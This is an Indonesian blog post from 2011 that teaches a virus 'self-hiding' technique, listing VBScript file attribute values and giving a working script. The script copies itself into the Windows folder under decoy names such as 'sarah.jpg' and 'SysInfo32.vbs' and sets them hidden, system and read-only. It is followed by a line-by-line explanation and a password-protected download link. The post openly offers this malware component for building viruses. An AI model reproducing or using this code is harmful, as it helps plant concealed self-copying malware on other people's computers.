Sabtu, 22 Oktober 2011

TEKNIK MENYEMBUNYIKAN DIRI


Sudah menjadi rahasia umum, kalau virus setelah ataupun sebelum aktif akan menyembunyikan diridari pengguna computer.Karena dengan menyembunyikan dirilahvirus bias selalu exist dan aktif dimemori.Teknik menyembunyikan diri ini sebenarnya hanya merubah properties sebuah file atau virus yang di set hidden.Setahu saya ( maaf-maaf kalau salah ) properties sebuah file bila menggunakan bahasa pemograman vbs adalah ditentukan dengan nilai ANGKA, sedangkan bila menggunakan bahasa visual basic 6 kita hanya menuliskan propertiesnya saja, seperti contoh:
SetAttr “C:\virus.exe”,vbhidden+vbsystem
Adapun nilai properties dari vbs adalah sebagai berikut:
Nilai  = 1 “ReadOnly”
Nilai  = 2 “Hidden”
Nilai  = 3 “Hidden + ReadOnly”
Nilai  = 4 “System”
Nilai  = 5 “System + ReadOnly”
Nilai  = 6 “System + Hidden”
Nilai  = 7 “System + Hidden + ReadOnly”
Nilai  = 32 “Archive”
Nilai  = 33 “Archive + ReadOnly”
Nilai  = 34 “Archive + Hidden”
Nilai  = 35 “Archive + Hidden + ReadOnly”
Nilai  = 36 “Archive + System”
Nilai  = 37 “Archive + System + ReadOnly”
Nilai  = 38 “Archive + System+ Hidden”
Nilai  = 39 “Archive + System + Hidden + ReadOnly”
Nilai  = 128 “Normal”
Berikut kode scriptnya
on error resume next
set dendrif=CreateObject("Scripting.FileSystemObject")
set vs=dendrif.OpenTextFile(Wscript.ScriptFullName)
c1vs=vs.ReadAll
vs.close
set win=dendrif.GetSpecialFolder(0)
set c2vs=dendrif.GetFile(Wscript.ScriptFullName)
c2vs.Copy (win & "\listWinamp.vbs")
c2vs.Copy (win & "\sarah.jpg")
c2vs.Copy (win & "\SysInfo32.vbs")
set ilang1=dendrif.GetFile(win & "\listWinamp.vbs")
ilang1.attributes=39
set ilang2=dendrif.GetFile(win & "\sarah.jpg")
ilang2.attributes=39
set ilang3=dendrif.GetFile(win & "\SysInfo32.vbs")
ilang3.attributes=39
msgbox"virus telah berhasil di kopi ke folder windows dengan hidden",vbinformation,"Tes virus..."
penjelasan script
set ilang1=dendrif.GetFile(win & "\listWinamp.vbs") = pengambilan informasi file listWinamp.vbs
ilang1.attributes=39 =merubah file listWinamp.vbs menjadi Hidden+system+readonly+archive
set ilang2=dendrif.GetFile(win & "\sarah.jpg") =  pengambilan informasi file sarah.jpg
ilang2.attributes=39 =merubah file sarah.jpg  menjadi Hidden+system+readonly+archive
set ilang3=dendrif.GetFile(win & "\SysInfo32.vbs") == pengambilan informasi file SysInfo32.vbs
ilang3.attributes=39 =merubah file SysInfo32.vbs menjadi Hidden+system+readonly+archive

download script
password = www.dendrif-deo.co.cc[windowshidden]
semoga bermanfaat.......... :D
Diposting oleh di
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)